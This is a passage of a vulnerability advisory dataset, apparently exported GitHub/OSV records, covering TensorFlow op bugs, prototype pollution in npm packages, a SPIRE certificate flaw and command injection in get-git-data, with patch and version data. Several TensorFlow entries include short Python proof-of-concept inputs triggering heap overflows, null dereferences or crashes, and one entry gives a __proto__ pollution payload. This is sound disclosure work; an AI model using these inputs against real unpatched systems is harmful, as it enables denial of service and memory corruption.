'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r4pj-74mg-8868'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29524'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:19:06Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-vvg4-vgrv-xfr7,2021-05-17T21:46:09Z,2021-05-21T14:28:39Z,,['CVE-2021-29613'],Incomplete validation in `tf.raw_ops.CTCLoss`,"### Impact +Incomplete validation in `tf.raw_ops.CTCLoss` allows an attacker to trigger an OOB read from heap: + +```python +import tensorflow as tf + +inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) +labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) +labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) +sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) + +tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, + labels_values=labels_values, sequence_length=sequence_length, + preprocess_collapse_repeated=True, ctc_merge_repeated=False, + ignore_longer_outputs_than_inputs=True) +``` + +An attacker can also trigger a heap buffer overflow: + +```python +import tensorflow as tf + +inputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32) +labels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64) +labels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32) +sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32) + +tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, + labels_values=labels_values, sequence_length=sequence_length, + preprocess_collapse_repeated=False, ctc_merge_repeated=False, + ignore_longer_outputs_than_inputs=False) +``` + +Finally, an attacker can trigger a null pointer dereference: + +```python +import tensorflow as tf + +inputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32) +labels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64) +labels_values = tf.constant([], shape=[0], dtype=tf.int32) +sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32) + +tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, + labels_values=labels_values, sequence_length=sequence_length, + preprocess_collapse_repeated=False, ctc_merge_repeated=False, + ignore_longer_outputs_than_inputs=False) +``` + +### Patches +We have patched the issue in GitHub commit[14607c0707040d775e06b6817325640cb4b5864c](https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c) followed by GitHub commit [4504a081af71514bb1828048363e6540f797005b](https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vvg4-vgrv-xfr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29613'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b'}]","{'cwe_ids': ['CWE-125', 'CWE-665'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:46:09Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-jh2m-j8pp-55rc,2021-05-05T18:26:34Z,2021-05-06T18:12:47Z,,['CVE-2020-7727'],Prototype Pollution in gedi,All versions of package gedi up to and including version 1.6.3 are vulnerable to Prototype Pollution via the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gedi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7727'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GEDI-598803'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:26:34Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-vrr3-5r3v-7xfw,2023-09-13T19:52:14Z,2021-05-17T21:00:52Z,,['CVE-2020-7679'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in casperjs,"### Overview +casperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS. + +Affected versions of this package are vulnerable to Prototype Pollution via the mergeObjects utility function. + +### PoC +```js +var payload = JSON.parse('{""__proto__"": {""a"": ""pwned""}}'); +mergeObjects({}, payload); +console.log({}.a); // prints ""pwned"" +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'casperjs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7679'}, {'type': 'PACKAGE', 'url': 'https://github.com/casperjs/casperjs'}, {'type': 'WEB', 'url': 'https://github.com/casperjs/casperjs/blob/master/modules/utils.js%23L680'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-572804'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CASPERJS-572803'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T22:26:54Z', 'nvd_published_at': '2020-06-19T11:15:00Z'}" +1.4.0,GHSA-h746-rm5q-8mgq,2021-05-21T14:28:38Z,2021-05-21T14:31:11Z,,['CVE-2021-27098'],Legacy Node API Allows Impersonation in github.com/spiffe/spire/pkg/server/endpoints/node,"#### Summary +In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already authorized to issue at least one SPIFFE ID, and the requested SPIFFE ID belongs to the same trust domain, prior to being able to trigger this vulnerability. This issue has been fixed in SPIRE versions 0.8.5, 0.9.4, 0.10.2, 0.11.3 and 0.12.1. + +#### What are the changes introduced by the patched versions? +The changes introduced to address this issue are related to enforcing that the FetchX509SVID RPC of SPIRE Server’s Legacy Node API only issues X.509 certificates with SPIFFE IDs that the agent is authorized to distribute. + +The patched version also includes a back-ported change that improves the handling of file descriptors related to workload attestation in SPIRE Agent. + +There are no changes in the expected behavior of SPIRE. + +#### Should I upgrade SPIRE? +All SPIRE users running affected versions are advised to upgrade to the corresponding patched version. + +#### Workarounds +No workarounds have been identified for this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/spiffe/spire/pkg/server/endpoints/node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.1'}, {'fixed': '0.8.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spiffe/spire/pkg/server/endpoints/node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.9.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spiffe/spire/pkg/server/endpoints/node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spiffe/spire/pkg/server/endpoints/node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.11.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spiffe/spire/pkg/server/endpoints/node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spiffe/spire/security/advisories/GHSA-h746-rm5q-8mgq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27098'}, {'type': 'WEB', 'url': 'https://github.com/spiffe/spire/commit/3c5115b57afc20a0a2c2b1b9dd60dd1fd9082e13'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27098'}]","{'cwe_ids': ['CWE-284', 'CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:28:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-8gv3-57p6-g35r,2021-05-18T20:23:08Z,2021-05-21T14:24:57Z,,['CVE-2021-29560'],Heap buffer overflow in `RaggedTensorToTensor`,"### Impact +An attacker can cause a heap buffer overflow in `tf.raw_ops.RaggedTensorToTensor`: + +```python +import tensorflow as tf + +shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) +values = tf.constant(0, shape=[1], dtype=tf.int64) +default_value = tf.constant(0, dtype=tf.int64) +l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] +row = tf.constant(l, shape=[5, 43], dtype=tf.int64) +rows = [row] +types = ['ROW_SPLITS'] + +tf.raw_ops.RaggedTensorToTensor( + shape=shape, values=values, default_value=default_value, + row_partition_tensors=rows, row_partition_types=types) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/d94227d43aa125ad8b54115c03cece54f6a1977b/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L219-L222) uses the same index to access two arrays in parallel: + +```cc +for (INDEX_TYPE i = 0; i < row_split_size - 1; ++i) { + INDEX_TYPE row_length = row_split(i + 1) - row_split(i); + INDEX_TYPE real_length = std::min(output_size, row_length); + INDEX_TYPE parent_output_index_current = parent_output_index[i]; + ... +} +``` + +Since the user controls the shape of the input arguments, an attacker could trigger a heap OOB access when `parent_output_index` is shorter than `row_split`. + +### Patches +We have patched the issue in GitHub commit [a84358aa12f0b1518e606095ab9cfddbf597c121](https://github.com/tensorflow/tensorflow/commit/a84358aa12f0b1518e606095ab9cfddbf597c121). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8gv3-57p6-g35r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29560'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a84358aa12f0b1518e606095ab9cfddbf597c121'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:23:08Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-wj6h-7chw-x4h2,2021-07-28T21:53:39Z,2021-05-10T15:59:14Z,,['CVE-2020-7619'],Command injection in get-git-data,get-git-data through 1.3.1 is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'get-git-data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7619'}, {'type': 'WEB', 'url': 'https://github.com/chardos/get-git-data/blob/master/index.js#L7,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GETGITDATA-564222'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T14:54:40Z', 'nvd_published_at': '2020-04-02T21:15:00Z'}" +1.4.0,GHSA-rgvq-pcvf-hx75,2021-05-17T22:11:44Z,2021-05-21T14:28:27Z,,['CVE-2021-29608'],Heap OOB and null pointer dereference in `RaggedTensorToTensor`,"### Impact +Due to lack of validation in `tf.raw_ops.RaggedTensorToTensor`, an attacker can exploit an undefined behavior if input arguments are empty: + +```python +import tensorflow as tf + +shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) +values = tf.constant([], shape=[0], dtype=tf.int64) +default_value = tf.constant(404, dtype=tf.int64) +row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) +rows = [row] +types = ['ROW_SPLITS'] + +tf.raw_ops.RaggedTensorToTensor( + shape=shape, values=values, default_value=default_value, + row_partition_tensors=rows, row_partition_types=types) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/656e7673b14acd7835dc778867f84916c6d1cac2/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L356-L360) only checks that one of the tensors is not empty, but does not check for the other ones. + +There are multiple `DCHECK` validations to prevent heap OOB, but these are no-op in release builds, hence they don't prevent anything. + +### Patches +We have patched the issue in GitHub commit [b761c9b652af2107cfbc33efd19be0ce41daa33e](https://github.com/tensorflow/tensorflow/commit/b761c9b652af2107cfbc33efd19be0ce41daa33e) followed by GitHub commit [f94ef358bb3e91d517446454edff6535bcfe8e4a](https://github.com/tensorflow/tensorflow/commit/f94ef358bb3e91d517446454edff6535bcfe8e4a) and GitHub commit [c4d7afb6a5986b04505aca4466ae1951686c80f6](https://github.com/tensorflow/tensorflow/commit/c4d7afb6a5986b04505aca4466ae1951686c80f6). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rgvq-pcvf-hx75'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29608'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b761c9b652af2107cfbc33efd19be0ce41daa33e'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c4d7afb6a5986b04505aca4466ae1951686c80f6'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f94ef358bb3e91d517446454edff6535bcfe8e4a'}]","{'cwe_ids': ['CWE-131'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:11:44Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-mmq6-q8r3-48fm,2021-05-17T21:16:27Z,2021-05-21T14:28:50Z,,['CVE-2021-29617'],Crash in `tf.strings.substr` due to `CHECK`-fail,"### Impact +An attacker can cause a denial of service via `CHECK`-fail in `tf.strings.substr` with invalid arguments: + +```python +import tensorflow as tf +tf.strings.substr(input='abc', len=1, pos=[1,-1]) +``` + +```python +import tensorflow as tf +tf.strings.substr(input='abc', len=1, pos=[1,2]) +``` + +### Patches +We have received a patch for the issue in GitHub commit [890f7164b70354c57d40eda52dcdd7658677c09f](https://github.com/tensorflow/tensorflow/commit/890f7164b70354c57d40eda52dcdd7658677c09f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported in [#46900](https://github.com/tensorflow/issues/46900) and fixed in [#46974](https://github.com/tensorflow/issues/46974).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': 